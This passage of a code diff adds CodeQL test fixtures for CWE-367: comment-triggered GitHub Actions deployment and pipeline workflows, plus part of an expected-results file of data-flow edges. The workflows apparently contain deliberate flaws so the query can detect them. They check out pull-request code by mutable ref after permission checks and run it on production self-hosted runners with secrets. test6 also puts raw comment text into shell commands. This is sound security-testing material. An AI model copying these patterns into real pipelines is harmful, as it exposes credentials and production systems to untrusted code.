fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Submit pipeline kickoff message to slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is in progress..." + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Kickoff run + if: contains(github.event.comment.body, '/kickoff') + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: poetry run python trainer.py --model=${{ steps.pipeline-info.outputs.mdl }} --as_pipeline=True --schedule=${{ steps.pipeline-info.outputs.schedule }} + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report pipeline's run outcome to slack + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Prune docker images + run: docker system prune --all --force diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml new file mode 100644 index 000000000000..9444ad0b627c --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml @@ -0,0 +1,89 @@ +name: Test + +on: + + issue_comment: + types: [created] + +jobs: + + deploy: + name: Update deployment + if: > + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + ( + github.event.issue.author_association == 'OWNER' || + github.event.issue.author_association == 'COLLABORATOR' || + github.event.issue.author_association == 'MEMBER' + ) + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Check comment keywords + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + head_sha="$(echo "$pr" | jq -r .head.sha)" + + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + echo "head_sha=$head_sha" >> $GITHUB_OUTPUT + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.environment.outputs.head_sha }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml new file mode 100644 index 000000000000..e3e557cc5112 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml @@ -0,0 +1,209 @@ +name: Autodeploy Model to AML + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Install jq + run: sudo apt-get update && sudo apt-get install -y jq + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + deploy: + + name: Update deployment + needs: security-checks + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout main + if: contains(github.event.comment.body, '/rollback') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + run: | + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Notify deployment start in slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is in progress..." + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Deploy server + if: >- + ${{ + (contains(github.event.comment.body, '/deploy to') || + contains(github.event.comment.body, '/rollback')) && + !contains(github.event.comment.body, 'scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + COMMENT_BODY: ${{ github.event.comment.body }} + run: poetry run python server.py --endpoint_location=remote --autodeploy=True + + - name: Deploy scorer + if: >- + ${{ + contains(github.event.comment.body, '/deploy as async scorer') || + contains(github.event.comment.body, '/rollback async scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + run: poetry run python scorer.py --as_pipeline=True --schedule=True --autodeploy=True + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report deployment outcome in slack + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: prune docker images + run: docker system prune --all --force diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml new file mode 100644 index 000000000000..4a6d1452af24 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml @@ -0,0 +1,253 @@ +name: Kickoff custom pipeline + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + contains(github.event.comment.body, '/kickoff') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + full_allowlist="$PR_COMMENT_ALLOW_LIST $(ls models)" + + if `list_subset "echo $full_allowlist" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + docker-environment-creation: + + name: Build and push docker image + needs: security-checks + if: >- + ${{ + contains(github.event.comment.body, 'rebuild') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + needs.security-checks.result == 'success' + }} + runs-on: [self-hosted, production] + + permissions: + contents: write + + defaults: + run: + # Run bash like it came from an interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Log into Azure + uses: azure/login@a65d910e8af852a8061c627c456678983e180302 # @v2.2.0 + with: + creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Container registry login + run: | + echo "Logging into $REGISTRY" + az acr login --name ${REGISTRY} + env: + REGISTRY: ${{ secrets.DOCKER_REGISTRY }} + + - name: Prune old images + run: | + docker system prune -a -f + + - name: Create image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/build_aml_image -m $model + + - name: Push image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/push_aml_image -m $model + + kickoff-pipeline: + + name: Kickoff pipeline + needs: [security-checks, docker-environment-creation] + if: >- + ${{ + always() && + needs.security-checks.result == 'success' && + needs.docker-environment-creation.result != 'failure' && + needs.docker-environment-creation.result != 'cancelled' + }} + + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + defaults: + run: + # Run bash like it came from an interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout PR branch + uses: actions/checkout@v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get pipeline info from comment + id: pipeline-info + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') && \ + scheduling=$(echo "${{ github.event.comment.body }}" | grep schedule | wc -l) && \ + echo "mdl=$model" >> $GITHUB_OUTPUT + if [[ $scheduling == 1 ]]; then + echo "schedule=True" >> $GITHUB_OUTPUT + else + echo "schedule=False" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Submit pipeline kickoff message to slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is in progress..." + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Kickoff run + if: contains(github.event.comment.body, '/kickoff') + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: poetry run python trainer.py --model=${{ steps.pipeline-info.outputs.mdl }} --as_pipeline=True --schedule=${{ steps.pipeline-info.outputs.schedule }} + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report pipeline's run outcome to slack + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Prune docker images + run: docker system prune --all --force diff --git a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected new file mode 100644 index 000000000000..da66ff822a39 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected @@ -0,0 +1,109 @@ +edges +| .github/workflows/actor.yml:17:9:20:6 | Uses Step | .github/workflows/actor.yml:20:9:21:16 | Run Step | +| .github/workflows/comment.yml:13:9:28:6 | Uses Step: issue | .github/workflows/comment.yml:28:9:32:6 | Uses Step | +| .github/workflows/comment.yml:28:9:32:6 | Uses Step | .github/workflows/comment.yml:32:9:34:2 | Run Step | +| .github/workflows/comment.yml:39:9:54:6 | Uses Step: issue | .github/workflows/comment.yml:54:9:58:6 | Uses Step | +| .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | +| .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | +| .github/workflows/deployment1.yml:16:10:22:7 | Uses Step | .github/workflows/deployment1.yml:22:10:27:7 | Uses Step | +| .github/workflows/deployment1.yml:22:10:27:7 | Uses Step | .github/workflows/deployment1.yml:27:10:30:7 | Run Step | +| .github/workflows/deployment1.yml:27:10:30:7 | Run Step | .github/workflows/deployment1.yml:30:10:31:53 | Run Step | +| .github/workflows/deployment2.yml:16:10:22:7 | Uses Step | .github/workflows/deployment2.yml:22:10:27:7 | Uses Step | +| .github/workflows/deployment2.yml:22:10:27:7 | Uses Step | .github/workflows/deployment2.yml:27:10:30:7 | Run Step | +| .github/workflows/deployment2.yml:27:10:30:7 | Run Step | .github/workflows/deployment2.yml:30:10:31:53 | Run Step | +| .github/workflows/label.yml:13:9:17:6 | Uses Step | .github/workflows/label.yml:17:9:17:41 | Run Step | +| .github/workflows/label_actor.yml:13:9:17:6 | Uses Step | .github/workflows/label_actor.yml:17:9:17:41 | Run Step | +| .github/workflows/test0.yml:13:9:28:6 | Uses Step: issue | .github/workflows/test0.yml:28:9:32:6 | Uses Step | +| .github/workflows/test0.yml:28:9:32:6 | Uses Step | .github/workflows/test0.yml:32:9:34:2 | Run Step | +| .github/workflows/test0.yml:39:9:54:6 | Uses Step: issue | .github/workflows/test0.yml:54:9:58:6 | Uses Step | +| .github/workflows/test0.yml:54:9:58:6 | Uses Step | .github/workflows/test0.yml:58:9:60:2 | Run Step | +| .github/workflows/test0.yml:64:9:68:6 | Uses Step | .github/workflows/test0.yml:68:9:68:43 | Run Step | +| .github/workflows/test1.yml:32:7:47:4 | Run Step | .github/workflows/test1.yml:47:7:86:4 | Run Step: environment | +| .github/workflows/test1.yml:47:7:86:4 | Run Step: environment | .github/workflows/test1.yml:86:7:92:4 | Uses Step | +| .github/workflows/test1.yml:86:7:92:4 | Uses Step | .github/workflows/test1.yml:92:7:95:54 | Uses Step | +| .github/workflows/test2.yml:38:7:41:4 | Uses Step | .github/workflows/test2.yml:41:7:44:4 | Run Step | +| .github/workflows/test2.yml:41:7:44:4 | Run Step | .github/workflows/test2.yml:44:7:58:4 | Run Step | +| .github/workflows/test2.yml:44:7:58:4 | Run Step | .github/workflows/test2.yml:58:7:76:2 | Run Step: environment | +| .github/workflows/test2.yml:90:7:94:4 | Uses Step: comment-branch | .github/workflows/test2.yml:94:7:101:4 | Uses Step | +| .github/workflows/test2.yml:94:7:101:4 | Uses Step | .github/workflows/test2.yml:101:7:105:4 | Uses Step | +| .github/workflows/test2.yml:101:7:105:4 | Uses Step | .github/workflows/test2.yml:105:7:111:4 | Uses Step | +| .github/workflows/test2.yml:105:7:111:4 | Uses Step | .github/workflows/test2.yml:111:7:135:4 | Run Step: environment | +| .github/workflows/test2.yml:111:7:135:4 | Run Step: environment | .github/workflows/test2.yml:135:7:141:4 | Run Step: email | +| .github/workflows/test2.yml:135:7:141:4 | Run Step: email | .github/workflows/test2.yml:141:7:149:4 | Run Step: slack-id | +| .github/workflows/test2.yml:141:7:149:4 | Run Step: slack-id | .github/workflows/test2.yml:149:7:169:4 | Uses Step: slack-initiate | +| .github/workflows/test2.yml:149:7:169:4 | Uses Step: slack-initiate | .github/workflows/test2.yml:169:7:174:4 | Uses Step | +| .github/workflows/test2.yml:169:7:174:4 | Uses Step | .github/workflows/test2.yml:174:7:187:4 | Run Step | +| .github/workflows/test2.yml:174:7:187:4 | Run Step | .github/workflows/test2.yml:187:7:198:4 | Run Step | +| .github/workflows/test2.yml:187:7:198:4 | Run Step | .github/workflows/test2.yml:198:7:206:4 | Uses Step | +| .github/workflows/test2.yml:198:7:206:4 | Uses Step | .github/workflows/test2.yml:206:7:226:4 | Uses Step | +| .github/workflows/test2.yml:206:7:226:4 | Uses Step | .github/workflows/test2.yml:226:7:227:45 | Run Step | +| .github/workflows/test3.yml:38:7:56:4 | Run Step: environment | .github/workflows/test3.yml:56:7:60:4 | Uses Step: comment-branch | +| .github/workflows/test3.yml:56:7:60:4 | Uses Step: comment-branch | .github/workflows/test3.yml:60:7:65:4 | Uses Step | +| .github/workflows/test3.yml:60:7:65:4 | Uses Step | .github/workflows/test3.yml:65:7:68:4 | Uses Step | +| .github/workflows/test3.yml:65:7:68:4 | Uses Step | .github/workflows/test3.yml:68:7:83:2 | Run Step | +| .github/workflows/test3.yml:106:7:110:4 | Uses Step: comment-branch | .github/workflows/test3.yml:110:7:115:4 | Uses Step | +| .github/workflows/test3.yml:110:7:115:4 | Uses Step | .github/workflows/test3.yml:115:7:120:4 | Uses Step | +| .github/workflows/test3.yml:115:7:120:4 | Uses Step | .github/workflows/test3.yml:120:7:127:4 | Run Step | +| .github/workflows/test3.yml:120:7:127:4 | Run Step | .github/workflows/test3.yml:127:7:131:4 | Run Step | +| .github/workflows/test3.yml:127:7:131:4 | Run Step | .github/workflows/test3.yml:131:7:136:4 | Run Step | +| .github/workflows/test3.yml:131:7:136:4 | Run Step | .github/workflows/test3.yml:136:7:141:2 | Run Step | +| .github/workflows/test3.yml:169:7:173:4 | Uses Step: comment-branch | .github/workflows/test3.yml:173:7:180:4 | Uses Step | +| .github/workflows/test3.yml:173:7:180:4 | Uses Step | .github/workflows/test3.yml:180:7:185:4 | Uses Step | +| .github/workflows/test3.yml:180:7:185:4 | Uses Step | .github/workflows/test3.yml:185:7:197:4 | Run Step: pipeline-info | +| .github/workflows/test3.yml:185:7:197:4 | Run Step: pipeline-info | .github/workflows/test3.yml:197:7:203:4 | Run Step: email | +| .github/workflows/test3.yml:197:7:203:4 | Run Step: email | .github/workflows/test3.yml:203:7:211:4 | Run Step: slack-id | +| .github/workflows/test3.yml:203:7:211:4 | Run Step: slack-id | .github/workflows/test3.yml:211:7:231:4 | Uses Step: slack-initiate | +| .github/workflows/test3.yml:211:7:231:4 | Uses Step: slack-initiate | .github/workflows/test3.yml:231:7:236:4 | Uses Step | +| .github/workflows/test3.yml:231:7:236:4 | Uses Step | .github/workflows/test3.yml:236:7:242:4 | Run Step | +| .github/workflows/test3.yml:236:7:242:4 | Run Step | .github/workflows/test3.yml:242:7:250:4 | Uses Step | +| .github/workflows/test3.yml:242:7:250:4 | Uses Step | .github/workflows/test3.yml:250:7:270:4 | Uses Step | +| .github/workflows/test3.yml:250:7:270:4 | Uses Step | .github/workflows/test3.yml:270:7:271:45 | Run Step | +| .github/workflows/test4.yml:32:7:47:4 | Run Step | .github/workflows/test4.yml:47:7:79:4 | Run Step: environment | +| .github/workflows/test4.yml:47:7:79:4 | Run Step: environment | .github/workflows/test4.yml:79:7:85:4 | Uses Step | +| .github/workflows/test4.yml:79:7:85:4 | Uses Step | .github/workflows/test4.yml:85:7:88:54 | Uses Step | +| .github/workflows/test5.yml:38:7:41:4 | Uses Step | .github/workflows/test5.yml:41:7:44:4 | Run Step | +| .github/workflows/test5.yml:41:7:44:4 | Run Step | .github/workflows/test5.yml:44:7:58:2 | Run Step | +| .github/workflows/test5.yml:72:7:76:4 | Uses Step: comment-branch | .github/workflows/test5.yml:76:7:83:4 | Uses Step | +| .github/workflows/test5.yml:76:7:83:4 | Uses Step | .github/workflows/test5.yml:83:7:87:4 | Uses Step | +| .github/workflows/test5.yml:83:7:87:4 | Uses Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | +| .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:93:7:117:4 | Run Step: environment | +| .github/workflows/test5.yml:93:7:117:4 | Run Step: environment | .github/workflows/test5.yml:117:7:123:4 | Run Step: email | +| .github/workflows/test5.yml:117:7:123:4 | Run Step: email | .github/workflows/test5.yml:123:7:131:4 | Run Step: slack-id | +| .github/workflows/test5.yml:123:7:131:4 | Run Step: slack-id | .github/workflows/test5.yml:131:7:151:4 | Uses Step: slack-initiate | +| .github/workflows/test5.yml:131:7:151:4 | Uses Step: slack-initiate | .github/workflows/test5.yml:151:7:156:4 | Uses Step | +| .github/workflows/test5.yml:151:7:156:4 | Uses Step | .github/workflows/test5.yml:156:7:169:4 | Run Step | +| .github/workflows/test5.yml:156:7:169:4 | Run Step | .github/workflows/test5.yml:169:7:180:4 | Run Step | +| .github/workflows/test5.yml:169:7:180:4 | Run Step | .github/workflows/test5.yml:180:7:188:4 | Uses Step | +| .github/workflows/test5.yml:180:7:188:4 | Uses Step | .github/workflows/test5.yml:188:7:208:4 | Uses Step | +| .github/workflows/test5.yml:188:7:208:4 | Uses Step | .github/workflows/test5.yml:208:7:209:45 | Run Step | +| .github/workflows/test6.yml:38:7:42:4 | Uses Step: comment-branch | .github/workflows/test6.yml:42:7:47:4 | Uses Step | +| .github/workflows/test6.yml:42:7:47:4 | Uses Step | .github/workflows/test6.yml:47:7:50:4 | Uses Step | +| .github/workflows/test6.yml:47:7:50:4 | Uses Step | .github/workflows/test6.yml:50:7:65:2 | Run Step | +| .github/workflows/test6.yml:88:7:92:4 | Uses Step: comment-branch | .github/workflows/test6.yml:92:7:97:4 | Uses Step | +| .github/workflows/test6.yml:92:7:97:4 | Uses Step | .github/workflows/test6.yml:97:7:102:4 | Uses Step | +| .github/workflows/test6.yml:97:7:102:4 | Uses Step | .github/workflows/test6.yml:102:7:109:4 | Run Step | +| .github/workflows/test6.yml:102:7:109:4 | Run Step | .github/workflows/test6.yml:109:7:113:4 | Run Step | +| .github/workflows/test6.yml:109:7:113:4 | Run Step | .github/workflows/test6.yml:113:7:118:4 | Run Step | +| .github/workflows/test6.yml:113:7:118:4 | Run Step | .github/workflows/test6.yml:118:7:123:2 | Run Step | +| .github/workflows/test6.yml:151:7:155:4 | Uses Step: comment-branch | .github/workflows/test6.yml:155:7:162:4 | Uses Step | +| .github/workflows/test6.yml:155:7:162:4 | Uses Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | +| .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:167:7:179:4 | Run Step: pipeline-info | +| .github/workflows/test6.yml:167:7:179:4 | Run Step: pipeline-info | .github/workflows/test6.yml:179:7:185:4 | Run Step: email | +| .github/workflows/test6.yml:179:7:185:4 | Run Step: email | .github/workflows/test6.yml:185:7:193:4 | Run 